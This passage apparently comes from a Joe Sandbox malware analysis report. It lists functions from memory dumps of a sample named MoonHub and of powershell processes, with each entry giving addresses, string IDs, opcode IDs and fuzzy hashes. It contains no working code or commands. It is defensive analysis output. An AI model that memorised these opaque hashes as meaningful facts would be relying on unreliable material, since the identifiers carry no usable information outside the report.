                                                                                                                                                                                • Opcode Fuzzy Hash: 66d4554c141e0481f952850f2dc9c65769ade8e6777f23bfbcb92a4b1dab0cfb
                                                                                                                                                                                • Instruction Fuzzy Hash: 6CC1D96480FAC5BFC74667B848669CABFE0EF03294B1405FFE0459F0A3DA9C4809C765
                                                                                                                                                                                Function 00007FF848E99600 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: [=j$ [=j$ [=j$ [=j$ [=j$ [=j$ [=j$[=jV
                                                                                                                                                                                • API String ID: 0-359273082
                                                                                                                                                                                • Opcode ID: c0e040a386b27d3bdf89f0b98d18769677f7284e219c4f7264cdafc3346ca80d
                                                                                                                                                                                • Instruction ID: f5ae0089ed1d0122ce970db69ffaee443bd3a8ad35a47ad494390f47fa986717
                                                                                                                                                                                • Opcode Fuzzy Hash: c0e040a386b27d3bdf89f0b98d18769677f7284e219c4f7264cdafc3346ca80d
                                                                                                                                                                                • Instruction Fuzzy Hash: 5FD1276180EAC6AFE796EB3848156EA7FE1FF07254F0844FDD489CB1A7EA6C5C058311
                                                                                                                                                                                Function 00007FF848E967BB Relevance: 9.0, Strings: 7, Instructions: 278COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: c=j$P9=j$h9=j$p9=j$x9=j$9=j$9=j
                                                                                                                                                                                • API String ID: 0-1585086864
                                                                                                                                                                                • Opcode ID: 743baebe2363209e96dfe1eef8493c3af8a96a9a4e2ea6d133ee828b5727701b
                                                                                                                                                                                • Instruction ID: 9ca95b2ac8bffca5ef54d50eac92016608e447ea3e649277438a31d0b76559f9
                                                                                                                                                                                • Opcode Fuzzy Hash: 743baebe2363209e96dfe1eef8493c3af8a96a9a4e2ea6d133ee828b5727701b
                                                                                                                                                                                • Instruction Fuzzy Hash: 60A1886050EA85FFD71A67B45C12ECAFFE0AF02255F2906FAE0459F0A3DAAC1844C765
                                                                                                                                                                                Function 00007FF848E96780 Relevance: 9.0, Strings: 7, Instructions: 237COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: c=j$`9=j$h9=j$p9=j$x9=j$9=j$9=j
                                                                                                                                                                                • API String ID: 0-4015424263
                                                                                                                                                                                • Opcode ID: df2071b36fefab9bbb806283cecc4c0920f0c6903b7a035b31d9d8d013668e30
                                                                                                                                                                                • Instruction ID: 66ac4d4496af06c30bbd645708660bd39af3959dc4f99a44106587c8f30416d1
                                                                                                                                                                                • Opcode Fuzzy Hash: df2071b36fefab9bbb806283cecc4c0920f0c6903b7a035b31d9d8d013668e30
                                                                                                                                                                                • Instruction Fuzzy Hash: 5691686054FA85BFC74AA7B45812ACAFFE0AF03254F2906FEE0459F0A3DA6C1C45C765
                                                                                                                                                                                Function 00007FF848ED8728 Relevance: 6.4, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: G_^H$G_^`$G_^b$G_^t$G_^v
                                                                                                                                                                                • API String ID: 0-843208800
                                                                                                                                                                                • Opcode ID: 7f63b7a71d5bce2bafeb5883dfad36541207f026d149da31d299bb2e4146ba75
                                                                                                                                                                                • Instruction ID: d0e8ddf5a14edc2a0ce9f995202551260a617e3666dfd54a561a7e69b7bc9bad
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f63b7a71d5bce2bafeb5883dfad36541207f026d149da31d299bb2e4146ba75
                                                                                                                                                                                • Instruction Fuzzy Hash: E14127B3D4E9562FE6187A6DB8061F93790FF803B5F0891B2C55DCA043DE2868478ED8
                                                                                                                                                                                Function 00007FF848E98AFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: K_^4$K_^5$K_^6$K_^?$K_^@
                                                                                                                                                                                • API String ID: 0-538154125
                                                                                                                                                                                • Opcode ID: 3fecba1278ac18b4fd634e32b38daf05b4fa41303905216f4c26a3e350bc6b3b
                                                                                                                                                                                • Instruction ID: e9eaa726bf62f2507fc4291d1e989f7c2226c34f456b5ee6bc46cfd71cb6a372
                                                                                                                                                                                • Opcode Fuzzy Hash: 3fecba1278ac18b4fd634e32b38daf05b4fa41303905216f4c26a3e350bc6b3b
                                                                                                                                                                                • Instruction Fuzzy Hash: 3A21E5F76899157E9A0A7A7CF4410F837A0EF94279B4892BBD0D8CE043DE1520878AD8
                                                                                                                                                                                Function 00007FF848E986F8 Relevance: 5.1, Strings: 4, Instructions: 92COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: K_^$K_^$K_^$K_^
                                                                                                                                                                                • API String ID: 0-1134090584
                                                                                                                                                                                • Opcode ID: 62e695368af1adcfb1b8c3164de1052538b3e88911f623432c7f8757e7c8ea63
                                                                                                                                                                                • Instruction ID: c77b4833287a372bf22dff88cab29835244c8e8293c460c9b2c223010a7f16fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 62e695368af1adcfb1b8c3164de1052538b3e88911f623432c7f8757e7c8ea63
                                                                                                                                                                                • Instruction Fuzzy Hash: 11210AB3C0D9A95FD759B66D78990F43790FF502ACF0802B3C888CF063EE2425078949
                                                                                                                                                                                Function 00007FF848E98700 Relevance: 5.1, Strings: 4, Instructions: 88COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: K_^$K_^$K_^$K_^
                                                                                                                                                                                • API String ID: 0-1134090584
                                                                                                                                                                                • Opcode ID: c605fc93687dc5c11523d38b7b197756d2ea84d0841bdfc9371bd0699c35255a
                                                                                                                                                                                • Instruction ID: dd4bd02126f3735b15067c38bca07761309842e9e4c39365321e429fb1953d55
                                                                                                                                                                                • Opcode Fuzzy Hash: c605fc93687dc5c11523d38b7b197756d2ea84d0841bdfc9371bd0699c35255a
                                                                                                                                                                                • Instruction Fuzzy Hash: D521E7B3C0D9A95ED759BA6D68590F43790FF106ACF0805B2C888CF063EE2425078A49
                                                                                                                                                                                Function 00007FF848E90758 Relevance: 5.0, Strings: 4, Instructions: 17COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: L_^0$L_^2$L_^4$L_^6
                                                                                                                                                                                • API String ID: 0-2047270763
                                                                                                                                                                                • Opcode ID: 7ff69ff954960246898db6f8392c9e3b0656f18a0b5d234f444cade3e08a98e0
                                                                                                                                                                                • Instruction ID: 096dac424462a065a4bbce8dd99eca834e1230e0644df7f089c456747d4d070a
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ff69ff954960246898db6f8392c9e3b0656f18a0b5d234f444cade3e08a98e0
                                                                                                                                                                                • Instruction Fuzzy Hash: C7D012FE8504281DD5061CA254E00EC1B84C2013B8F207AA3D766D5103CB51D2C3D454
                                                                                                                                                                                Function 00007FF848E90728 Relevance: 5.0, Strings: 4, Instructions: 3COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: L_^0$L_^2$L_^4$L_^6
                                                                                                                                                                                • API String ID: 0-2047270763
                                                                                                                                                                                • Opcode ID: d90a10634a7569a9da6b03dbebb3bb10331e8b5eb83a67a642f421c0b94b6a51
                                                                                                                                                                                • Instruction ID: 4c771ec9a905e9939f82cf47e206dc1887f867e2bc9531701f7ea0ad4ab58e76
                                                                                                                                                                                • Opcode Fuzzy Hash: d90a10634a7569a9da6b03dbebb3bb10331e8b5eb83a67a642f421c0b94b6a51
                                                                                                                                                                                • Instruction Fuzzy Hash: 1E900282499492249209656460510F45B119A06176A0C95A1D0C808043690520854558

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00007FF848F339D1 Relevance: 2.6, Strings: 1, Instructions: 1360COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309877689.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: L_H
                                                                                                                                                                                • API String ID: 0-402390507
                                                                                                                                                                                • Opcode ID: 0cc78d3a70c5b9cc40fea8128266648b727a9d7a9461d9011d3c08bb2456e869
                                                                                                                                                                                • Instruction ID: aa07d982f1df3f70dbaa3c473e334af9be3b7b9fad5e604e45f2f2fd563fd81e
                                                                                                                                                                                • Opcode Fuzzy Hash: 0cc78d3a70c5b9cc40fea8128266648b727a9d7a9461d9011d3c08bb2456e869
                                                                                                                                                                                • Instruction Fuzzy Hash: 9B820232E0DA8A5FE79AEB2C68555B43BE1EF66250F0901FBD04DC71D3DE18AC068356
                                                                                                                                                                                Function 00007FF848F36605 Relevance: .4, Instructions: 443COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309877689.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7f0af59d5a4c555838b68249a4fac40a0abd8e470cfba486435470de55350aec
                                                                                                                                                                                • Instruction ID: 0e37d538b9c5f398fbe5b55825a3f2c70f902c0b0bad90e4496af0d98543ef3e
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f0af59d5a4c555838b68249a4fac40a0abd8e470cfba486435470de55350aec
                                                                                                                                                                                • Instruction Fuzzy Hash: E6D11271E1EA8A5FEB95EB28A8155B57BE0EF16390F1801FBD04DCB0D3EE1CA8058355
                                                                                                                                                                                Function 00007FF848E69728 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309436305.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848e60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 568d9185e3864e3866bab831e9c68cd28c9d3182649fd415470d643c4493a514
                                                                                                                                                                                • Instruction ID: 798717caebb10aa3c6969af4fa599abe153109de6679ff583efc1501a72c2af2
                                                                                                                                                                                • Opcode Fuzzy Hash: 568d9185e3864e3866bab831e9c68cd28c9d3182649fd415470d643c4493a514
                                                                                                                                                                                • Instruction Fuzzy Hash: 99412871D1DA885FDB09AF2CA80A2E8BBE1FB55710F54416FD44993287DB34BC0687C6
                                                                                                                                                                                Function 00007FF848D4E380 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2308913385.00007FF848D4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D4D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848d4d000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fe732969e5dbc6ba94de883c11f18f77303fcb695bae756676d270dc9c702ccb
                                                                                                                                                                                • Instruction ID: abea04da87635485e519664639516e9e566591274fcd126a8bcdf132881f8ca7
                                                                                                                                                                                • Opcode Fuzzy Hash: fe732969e5dbc6ba94de883c11f18f77303fcb695bae756676d270dc9c702ccb
                                                                                                                                                                                • Instruction Fuzzy Hash: FE41237180EBC45FE7969B389845A523FF0EF52361F1505EFD088CB1A3D725A80AC792
                                                                                                                                                                                Function 00007FF848E6A4AC Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309436305.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848e60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b63661639da953670371e57a0d922888a7ba20ac32b5764f970c13215931339
                                                                                                                                                                                • Instruction ID: 8d238736f0680596df67ded74510b346d8605dc89d83171bfac96d37d45c9918
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b63661639da953670371e57a0d922888a7ba20ac32b5764f970c13215931339
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21263090CB884FDB59DA6C8C4A6E57BE0EB97320F04426FD099C31A2DA64A456C792
                                                                                                                                                                                Function 00007FF848F340BF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309877689.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5ad8ce5bbe5a3f63acd9c17aa320878f00ce968b5f5ee1d722a03de65076445c
                                                                                                                                                                                • Instruction ID: ec515b8a7ba37d617a8861fb33a627bc29f381edbc86eefa20e65e0123ccb8ec
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ad8ce5bbe5a3f63acd9c17aa320878f00ce968b5f5ee1d722a03de65076445c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1221BD32E1EE864FE7ABAB68546017466D1FF75290F5900BBC05EC72E6CF18EC048649
                                                                                                                                                                                Function 00007FF848E633B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309436305.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848e60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                • Instruction ID: bc0586010bb7648f8a9788ff2eea40288e3a4c6b570a1a89675a5d11dfb431f3
                                                                                                                                                                                • Opcode Fuzzy Hash: 42f32a37e772bc675462bcf5eaa5a2b152438d1bfc6ca3e4267f2be6b1a4fcf4
                                                                                                                                                                                • Instruction Fuzzy Hash: CC01A73010CB0D4FDB44EF0CE051AA6B3E0FB85360F10052DE58AC3651DB32E882CB45
                                                                                                                                                                                Function 00007FF848E69CF8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309436305.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848e60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f03e7ebb20d11a0e17887c6e50833750486840dadd92dca0b151b23870a7e936
                                                                                                                                                                                • Instruction ID: 161da19503af04ae3f9fe3b5c78e0f3707bdd501628004cfa3ab2899c18ec868
                                                                                                                                                                                • Opcode Fuzzy Hash: f03e7ebb20d11a0e17887c6e50833750486840dadd92dca0b151b23870a7e936
                                                                                                                                                                                • Instruction Fuzzy Hash: 9CF0B43180CA894FDB46EF2888595D57FA0FF56350F0402ABE458C70A2DB75A458CB82
                                                                                                                                                                                Function 00007FF848F34405 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309877689.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8c32f7c63fcd6cd9f80e4fd06b445802156743b11c8db7d9d9ca51c18fdc6e60
                                                                                                                                                                                • Instruction ID: 50137f2737703330ccff21d7015d417befea8fd6ea93a12fecd1fb782bf30932
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c32f7c63fcd6cd9f80e4fd06b445802156743b11c8db7d9d9ca51c18fdc6e60
                                                                                                                                                                                • Instruction Fuzzy Hash: C7F05831A0D5448FE794EB5CE8419A8B7F0EF65360B5500F7E159CB0A3DB2AAC618754

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 00007FF848E68BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309436305.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848e60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                                                                                                                • API String ID: 0-4116931533
                                                                                                                                                                                • Opcode ID: 4488404bc8ae31a008ec9fb42eb0aec430a88785829394b4aa67b8cb2f0cfac0
                                                                                                                                                                                • Instruction ID: ec3f6b674769187948be21f018cfc7cd61f94dc8a3c8c5b4e41ef41863a4ea89
                                                                                                                                                                                • Opcode Fuzzy Hash: 4488404bc8ae31a008ec9fb42eb0aec430a88785829394b4aa67b8cb2f0cfac0
                                                                                                                                                                                • Instruction Fuzzy Hash: 6721F3A77498266FD30977ADBC105E86780EB942B6B4841B3D358CB503DA14608B8BD5
                                                                                                                                                                                Function 00007FF848E689FA Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000B.00000002.2309436305.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_11_2_7ff848e60000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                • API String ID: 0-3900292545
                                                                                                                                                                                • Opcode ID: 58d080c51caffa39a3f1527b8be784ae46f301a609e5d8fd3917c99904e8dfed
                                                                                                                                                                                • Instruction ID: 07c724d2138be6fdbef50ed60180d3ff17ae28d59aceb7f5a87f65980478923a
                                                                                                                                                                                • Opcode Fuzzy Hash: 58d080c51caffa39a3f1527b8be784ae46f301a609e5d8fd3917c99904e8dfed
                                                                                                                                                                                • Instruction Fuzzy Hash: EE31D8A3A0E5D24FE38A87289C75055BF60FF52398B4D01FEC5895B083EE6968079606

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00007FF848F42536 Relevance: .4, Instructions: 447COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2338304280.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 641de11c21f18b8b5909ea39acbfae17ef6d2d157691e12960756bdd7531111a
                                                                                                                                                                                • Instruction ID: e34c427f09a9b51336d7ab47a4173ff7d67725f26fd226ad9872b97dd11b84d6
                                                                                                                                                                                • Opcode Fuzzy Hash: 641de11c21f18b8b5909ea39acbfae17ef6d2d157691e12960756bdd7531111a
                                                                                                                                                                                • Instruction Fuzzy Hash: 7DD14631D0EA8A5FE796ABA858145B97BE1EF26750F1801FBD04CC71D3EB289C05C365
                                                                                                                                                                                Function 00007FF848E73547 Relevance: .4, Instructions: 427COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2337896425.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848e70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 941fbace1fae1be0b7d66e10afc6eb33dce03515103ee94f825320de16830a7b
                                                                                                                                                                                • Instruction ID: e1afed49720fe82d8d0da61bf87dcfebfa0992ea0a55132f59da156f95304ffa
                                                                                                                                                                                • Opcode Fuzzy Hash: 941fbace1fae1be0b7d66e10afc6eb33dce03515103ee94f825320de16830a7b
                                                                                                                                                                                • Instruction Fuzzy Hash: 36514772A0DA955FE34AA62CE8550F13BD0FF527A0B5801BFD088CB193DE256C47C391
                                                                                                                                                                                Function 00007FF848F42053 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2338304280.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 616b9fb06df113c64a63b9db2dbf237e0526d4bee153d4ee341818fd661eac23
                                                                                                                                                                                • Instruction ID: ad6582cc94214a6da8be751fd49bd0a3758dfd4d5faf2f855aefca68e3ea3014
                                                                                                                                                                                • Opcode Fuzzy Hash: 616b9fb06df113c64a63b9db2dbf237e0526d4bee153d4ee341818fd661eac23
                                                                                                                                                                                • Instruction Fuzzy Hash: 5981F23290EBC50FE753A7A868641A57FE0EFA7660F0901FBC049DB0E3DA195D45C362
                                                                                                                                                                                Function 00007FF848F4206A Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2338304280.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848f40000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d3d613ba2b1648dc89083a610ef3922f456c5a57cabdc136b48c83a2ae9ebf57
                                                                                                                                                                                • Instruction ID: d6c79afeb721ca8c82609ceb1248747423faae8d7b39fc2a2493cc3c88ec37ab
                                                                                                                                                                                • Opcode Fuzzy Hash: d3d613ba2b1648dc89083a610ef3922f456c5a57cabdc136b48c83a2ae9ebf57
                                                                                                                                                                                • Instruction Fuzzy Hash: DE61D02284E7C60FE75357B858641A13FF19FA7A60B0E01FBD089DB0E3DA195C4AC366
                                                                                                                                                                                Function 00007FF848E73728 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000F.00000002.2337896425.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_15_2_7ff848e70000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b2a7b1f44a79f8556a83655099b23a40e9a133b3e0198a59266a9d13e26c5493
